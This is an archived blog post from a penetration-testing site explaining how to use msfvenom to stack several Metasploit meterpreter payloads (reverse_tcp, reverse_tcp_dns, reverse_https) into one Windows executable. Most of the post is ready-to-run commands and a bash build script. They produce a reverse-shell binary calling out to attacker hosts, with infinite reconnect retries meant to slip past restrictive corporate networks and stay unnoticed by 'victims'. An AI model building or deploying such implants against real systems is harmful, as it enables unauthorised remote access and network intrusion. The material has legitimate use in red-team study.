<!DOCTYPE html>
<html>

    <head>
        <title> Metasploit Payloads Explained - Part 1b &middot;  </title>

        <meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
<meta name="generator" content="Hugo 0.52" />


<script   src="https://code.jquery.com/jquery-3.1.1.min.js"   integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="   crossorigin="anonymous"></script>


<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">

<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>


<link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">


<link rel="stylesheet" href="https://malicious.link/css/nix.css">


<link href="https://fonts.googleapis.com/css?family=Inconsolata|Open+Sans|Roboto|Montserrat|Concert+One" rel="stylesheet">



<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
		  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
		  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
				  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-198967-1', 'auto');
	  ga('send', 'pageview');

</script>


    </head>

    <body>
        <header>
<nav class="navbar navbar-default navbar-fixed-top navbar-inverse font-header">
	<div class="container-fluid">
		<div class="navbar-header">
			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar-collapse-1" aria-expanded="false">
				<span class="sr-only">Toggle navigation</span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			</button>
			<a class="navbar-brand" id="green-terminal" href=https://malicious.link/>mubix@malicious.link ~ $</a>
		</div>

		
		<div class="collapse navbar-collapse" id="navbar-collapse-1">
			<ul class="nav navbar-nav navbar-right">
				<li>
					<a href="https://malicious.link/">/home/mubix</a>
				</li>

				
				
				<li >
					<a href="/brandon">~/brandon</a>
				</li>
				
				
				<li >
					<a href="/start">~/start</a>
				</li>
				
				
				<li >
					<a href="/about">~/about</a>
				</li>
				
				
				<li >
					<a href="/post">~/posts</a>
				</li>
				

			</ul>
		</div>
	</div>
</nav>
</header>

        <div class="container wrapper">
            <h1><a href="https://malicious.link/post/2011/2011-07-17-metasploit-payloads-explained-part-1b/">Metasploit Payloads Explained - Part 1b</a></h1>
            <span class="post-date">Jul 17, 2011 </span>
            <div class="post-content">
                <p>This series was interrupted a bit by the new Metasploit HTTP/HTTPS payloads (<a href="https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication">more info</a>). Definitely not complaining though as the new features *(as will be discussed in part 2) are some epic new additions to the payloads list. However an important change happened while the craziness over the new payloads was going on. ScriptJunkie snuck in an awesome change to msfvenom (a.k.a. msffsm).</p>

<p>Here is the link to the ticket about the change (<a href="https://dev.metasploit.com/redmine/issues/4714">link</a>) and the revision (<a href="https://dev.metasploit.com/redmine/projects/framework/repository/revisions/13057">r13057</a>)</p>

<p><strong>TL;DR version</strong>: This change allows you to put multiple payloads into one binary&hellip; ya.. awesomesauce.</p>

<p>He gives the following example:</p>

<pre><code>ruby msfvenom -p windows/messagebox -f raw EXITFUNC=thread &gt; /tmp/msgbox.raw
ruby msfvenom -p windows/meterpreter/reverse_tcp -f raw -t /tmp/msgbox.raw -k LHOST=192.168.0.102 EXITFUNC=thread &gt; /tmp/rev102msgbox.raw
ruby msfvenom -p - -f exe &lt; /tmp/rev102msgbox.raw &gt; /tmp/rev102msgbox.exe
</code></pre>

<p>This example when &lsquo;rev102msgbox.exe&rsquo; is run will pop up a message box with the default options (Hello, from MSF!) and throw a reverse)tcp connection to 192.168.0.102 over the default port of 4444.</p>

<p>This is great as an example and a good way to test to see if things are working, but I don&rsquo;t normally like to inform my victims that I&rsquo;m there by saying hello (especially if I&rsquo;m not there to see their faces).</p>

<p>So I thought that this would be a great way of throwing a bunch of payloads together to try a few of the tried and true ways of getting past restrictive networks all in one binary. I started off with 3 payloads:</p>

<ul>
<li>reverse_tcp_dns to port 7815</li>
<li>reverse_tcp_dns to port 80</li>
<li>reverse_https to port 443</li>
</ul>

<p>I chose those because I can change the DNS to point to a new IP address in future without having to regenerate my binary and size really isn&rsquo;t a concern since I won&rsquo;t be using it in an exploit.</p>

<p><em>(<strong>SIDE NOT</strong>E: The motive for the port 7815 one is because sometimes there are proxy settings for port 80 and 443 <em>which the new HTTP/HTTPS payloads can handle (&lsquo;cept for Auth proxies)</em> but for some reason quite regularly companies will still allow odd ports to fly through unencumbered)</em></p>

<p>Here is what I did:</p>

<pre><code>./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=badguy.attacker.com LPORT=443 &gt; /tmp/stage1.raw
./msfvenom -p windows/meterpreter/reverse_tcp_dns -f raw LHOST=badguy.attacker.com LPORT=80 -c /tmp/stage1.raw &gt; /tmp/stage2.raw
./msfvenom -p windows/meterpreter/reverse_tcp_dns -f exe LHOST=badguy2.attacker.com LPORT=7815 -c /tmp/stage2.raw &gt; /tmp/stage3.exe
</code></pre>

<p>Luckily (and you&rsquo;ll see why in a second) I forgot to set up a multi/handler on port 7815, which caused me to notice an issue. When one of the payloads failed to connect, &lsquo;<strong>ExitProcess</strong>&rsquo; was called, causing all of my payloads to die prematurely (even if they had already gotten the second stage).</p>

<p>I tried setting <strong>AutoRunScript</strong> to &lsquo;migrate -f&rsquo; so that the payloads would migrate out into a new Notepad process. But the connection died too quickly and none of the payloads were fast enough at jumping ship.</p>

<p><strong>ReverseConnectRetries</strong> to the rescue. This is an advanced setting for the reverse_tcp family (ipv6_tcp, nonx_tcp, ord_tcp, tcp, tcp_allports, tcp_dns) which tells the payload how many times to loop through the initial connection. This setting defaults to 5 but can be anything between 1 and 255. The 255 setting is special since it actually sets an infinite loop. Sweet, now our sinking should never call the ExitProcess command right? Not quite, reverse_https and reverse_http doesn&rsquo;t have this setting. We are still in a bit of a race condition if we want to use those payloads but it is a race we can win now at least.</p>

<p>I wrote a very simple batch file to generate my new binary when I need it (also so I don&rsquo;t have to remember all the commands):</p>

<pre><code class="language-bash">#!/bin/bash

echo Building Stage 1
./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=badguy.attacker.com LPORT=443 &gt; /tmp/stage1.raw

echo Building Stage 2
./msfvenom -p windows/meterpreter/reverse_tcp_dns -f raw LHOST=badguy.attacker.com ReverseConnectRetries=255 LPORT=80 -c /tmp/stage1.raw &gt; /tmp/stage2.raw

echo Building Stage 3
./msfvenom -p windows/meterpreter/reverse_tcp_dns -f exe LHOST=badguy2.attacker.com ReverseConnectRetries=255 LPORT=7815 -c /tmp/stage2.raw &gt; /tmp/stage3.exe

echo Cleaning up...
rm -rf /tmp/stage1.raw /tmp/stage2.raw

echo Done..
</code></pre>

<p>Plus it tells you whats going on and does a bit of clean up, leaving you with just your hydra-binary. One of the things I thought about adding was the cmd/windows/adduser payload just so if the user is an admin we can start our day off without having to add ourselves a user but I decided against it just for clean up and &ldquo;noise&rdquo; purposes.</p>

<p>(You&rsquo;ll also notice that one of the payloads is going somewhere else.. no reason to not give your payloads every chance of getting out) Sharing is caring right?</p>

            </div>
            
            <div class="post-comments">
                
            </div>
            
            <div class="push"></div>
        </div>
        <footer class="footer text-center">
<p>Copyright &copy; 2018 Malicious.Link -
<span class="credit">
	Powered by
	<a target="_blank" href="https://gohugo.io">Hugo</a>
	and
	<a target="_blank" href="https://github.com/LordMathis/hugo-theme-nix/">Nix</a> theme.
</span>
</p>

</footer>

    </body>
